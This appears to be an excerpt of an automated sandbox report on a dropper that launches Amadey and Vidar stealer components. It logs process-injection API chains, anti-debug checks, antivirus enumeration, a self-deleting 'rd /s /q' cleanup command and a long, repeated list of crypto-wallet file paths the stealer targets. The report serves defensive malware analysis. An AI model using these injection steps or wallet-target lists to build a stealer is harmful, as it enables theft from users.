Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe	Code function: 9_2_00007FF6831111AD _initterm,SetUnhandledExceptionFilter,	9_2_00007FF6831111AD
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0041ECC8 SetUnhandledExceptionFilter,	10_2_0041ECC8
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0041D12F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_0041D12F
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_0041CAF5 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_0041CAF5
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C29B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_6C29B66C
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C29B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_6C29B1F7
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_6C44AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_6C44AC62

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: build_2024-07-25_20-56.exe PID: 2260, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Code function: 10_2_0040ED80 memset,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,ResumeThread,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,

10_2_0040ED80

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_00411400 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,FindCloseChangeNotification,		10_2_00411400
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Code function: 10_2_004112F0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		10_2_004112F0

Source: C:\Users\user\Desktop\IRqsWvBBMc.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000019001\server.exe "C:\Users\user\AppData\Local\Temp\1000019001\server.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe "C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Process created: C:\ProgramData\CFHIIJDBKE.exe "C:\ProgramData\CFHIIJDBKE.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\KFCFBFHIEBKJ" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: axplong.exe, axplong.exe, 00000007.00000002.3352609024.0000000000AEF000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: tProgram Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_0090D312 cpuid

7_2_0090D312

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

10_2_0040FC30

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000019001\server.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000019001\server.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_0090CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

7_2_0090CB1A

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 7_2_008F65B0 LookupAccountNameA,

7_2_008F65B0

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Code function: 10_2_0040FBC0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

10_2_0040FBC0

Source: C:\Users\user\AppData\Local\Temp\1000019001\server.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3363786257.0000000019010000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 3.2.axplong.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.IRqsWvBBMc.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.axplong.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3352145321.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2168239897.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2144127481.0000000000141000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2129982774.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2103618425.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2127712847.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2708396378.0000000004920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2170594328.00000000008F1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 10.2.build_2024-07-25_20-56.exe.3fa0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.build_2024-07-25_20-56.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.build_2024-07-25_20-56.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.build_2024-07-25_20-56.exe.3fa0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.build_2024-07-25_20-56.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3355872691.0000000003FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2796849673.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3355278855.0000000002577000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build_2024-07-25_20-56.exe PID: 2260, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: build_2024-07-25_20-56.exe, 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmp	String found in binary or memory: tWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
